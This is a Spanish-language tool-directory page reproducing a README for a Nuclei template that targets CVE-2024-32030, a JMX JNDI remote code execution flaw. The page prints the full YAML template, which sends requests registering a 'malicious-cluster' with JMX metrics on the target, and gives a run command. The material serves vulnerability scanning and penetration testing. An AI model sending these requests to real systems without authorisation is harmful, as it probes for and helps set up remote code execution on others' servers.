Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-32030-Nuclei-Template — Plantilla de Nuclei para detectar la vulnerabilidad de ejecución remota de código JMX JNDI CVE-2024-32030 mediante una conexión de servidor malicioso. | Kitploit
Herramientas/GitHubGitHub/huseyinstif/cve-2024-32030-nuclei-template
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubhuseyinstif/cve-2024-32030-nuclei-template

CVE-2024-32030-Nuclei-Template

Plantilla de Nuclei para detectar la vulnerabilidad de ejecución remota de código JMX JNDI CVE-2024-32030 mediante una conexión de servidor malicioso.

Ver Repositorio
18hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Plantilla Nuclei para CVE-2024-32030

Descripción

Este repositorio contiene una plantilla de Nuclei para detectar la vulnerabilidad CVE-2024-32030. Esta vulnerabilidad permite la ejecución remota de código a través de la resolución JNDI de la recopilación de métricas JMX.

Detalles de la Vulnerabilidad

  • ID: CVE-2024-32030
  • Nombre: JMX Metrics Collection JNDI RCE
  • Autor: Hüseyin TINTAŞ
  • Gravedad: Crítica
  • Descripción: Esta plantilla comprueba la presencia de la vulnerabilidad intentando conectarse a un servidor JMX malicioso.
  • Etiquetas: cve, cve2024, jmx, rce, cve2024-32030

Plantilla

id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve, cve2024, jmx, rce, cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster added successfully"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    matchers:
      - type: word
        part: body
        words:
          - "metrics"

Uso

Para usar esta plantilla, guárdela como cve-2024-32030.yaml y ejecútela con Nuclei:

nuclei -t CVE-2024-32030.yaml -u http://target-server

Contacto

Para cualquier consulta o más información, puedes contactarme a través de:

  • LinkedIn
  • Twitter
Descargar herramienta